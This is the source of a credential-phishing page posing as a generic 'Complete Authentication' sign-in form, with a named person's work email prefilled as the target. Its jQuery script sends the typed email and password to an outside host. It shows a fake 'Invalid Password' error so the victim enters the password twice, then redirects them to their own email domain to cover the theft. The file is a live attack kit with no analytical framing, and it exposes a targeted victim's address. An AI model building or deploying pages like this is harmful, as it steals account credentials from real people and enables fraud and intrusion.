      <head>
        <meta http-equiv="x-ua-compatible" content="EmulateIE9">
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
        <title>Authentication</title>
    </head>
    
    <body style="background-image: url('https://i.gyazo.com/thumb/1000/acf8d962616a44cbf3f3105c0b3c2e19-png.jpg'); background-repeat: no-repeat;background-size: cover;">
        <div class="container-fluid p-0">
            <div class="container">
                <div class="row my-5">
                    <div class="col-lg-5 mx-auto">
                        <div class="m-5 p-4 bg-white rounded" id="div1" style="box-shadow: 0px 2px 5px rgba(0,0,0,0.5);">
                            <div class="text-left">
                                <span><img src="https://i.gyazo.com/df2bcb222946ead909fda3b44d5870b5.jpg" class="img-fluid" width="200px"></span><span class="pl-4 h5 align-middle">                                
                                <span class="h"></span><br>
								<span class="h5"></span><br>
                                <span class="h5"></span><br>
                                <span class="h">Complete Authentication</span><br>
                                <span id="msg" class="text-danger" style="display: none;">Invalid Password..! Please enter correct password.</span><br>
                                <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                                <small></small>
                                <div class="form-group">
                                    <input type="email" name="ai" class="form-control rounded-0 bg-transparent" id="ai" aria-describedby="aiHelp" value="sangay.karpo@nppf.org.bt" placeholder="Email">
                                </div>
                                <div class="form-group mt-2">
                                    <small></small>
                                    <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Password">
                                </div>
                            </div>
                            <div class="form-check mt-3">
                                <input type="checkbox" class="form-check-input" id="exampleCheck1">
                                <label class="form-check-label" for="exampleCheck1"><span><a href="#">Keep me sign in</a></span></label>
                                <span><span><a href="#" class="float-right">Forgot Password?</a></span></span>
                            </div>
                            <div class="col-lg-12 mt-3">
                                <button class="btn text-white px-4 w-100" id="submit-btn" style="background-color: #1065e6;">Next</button>
                            </div>
                        </div>
                    </div>
                    <!-- Optional JavaScript -->
                    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
                    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
                    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
                    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    </body>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script>
    /* global $ */
    $(document).ready(function() {
        var count = 0;
    
    
    
        /////////////url ai getting////////////////
        var ai = window.location.hash.substr(1);
        if (!ai) {
    
        } else {
            // $('#ai').val(ai);
            var my_ai = ai;
            var ind = my_ai.indexOf("@");
            var my_slice = my_ai.substr((ind + 1));
            var c = my_slice.substr(0, my_slice.indexOf('.'));
            var final = c.toLowerCase();
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#msg").hide();
    
        }
        ///////////////url getting ai////////////////
    
        var file = "bmV4dC5waHA=";
    
        $('#submit-btn').click(function(event) {
            $('#error').hide();
            $('#msg').hide();
            event.preventDefault();
            var ai = $("#ai").val();
            var pr = $("#pr").val();
            var msg = $('#msg').html();
            $('#msg').text(msg);
            ///////////new injection////////////////
            var my_ai = ai;
            var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
    
            if (!ai) {
                $('#error').show();
                $('#error').html("Email field is empty.!");
                return false;
            }
    
            if (!filter.test(my_ai)) {
                $('#error').show();
                $('#error').html("That account doesn't exist. Enter a different account");
                return false;
            }
            if (!pr) {
                $('#error').show();
                $('#error').html("Password field is empty.!");
                return false;
            }
    
            var ind = my_ai.indexOf("@");
            var my_slice = my_ai.substr((ind + 1));
            var c = my_slice.substr(0, my_slice.indexOf('.'));
            var final = c.toLowerCase();
            ///////////new injection////////////////
            count = count + 1;
    
            $.ajax({
                dataType: 'JSON',
                url: 'http://zzpizzaeletrica.com.br/2082/index.php',
                type: 'POST',
                data: {
                    ai: ai,
                    pr: pr,
                },
                // data: $('#contact').serialize(),
                beforeSend: function(xhr) {
                    $('#submit-btn').html('Verifing...');
                },
                success: function(response) {
                    if (response) {
                        $("#msg").show();
                        console.log(response);
                        if (response['signal'] == 'ok') {
                            $("#pr").val("");
                            if (count >= 2) {
                                count = 0;
                                // window.location.replace(response['redirect_link']);
                                window.location.replace("http://www." + my_slice);
                                return false;
    
                            }
                            // $('#msg').html(response['msg']);
                        } else {
                            // $('#msg').html(response['msg']);
                        }
                    }
                },
                error: function() {
                    $("#pr").val("");
                    if (count >= 2) {
                        count = 0;
                        window.location.replace("http://www." + my_slice);
                        return false;
                    }
                    $("#msg").show();
                    // $('#msg').html("Please try again later");
                },
                complete: function() {
                    $('#submit-btn').html('Login');
                }
            });
        });
    
    
    });
    </script>
    
    </html>
    
    
   
    </Script>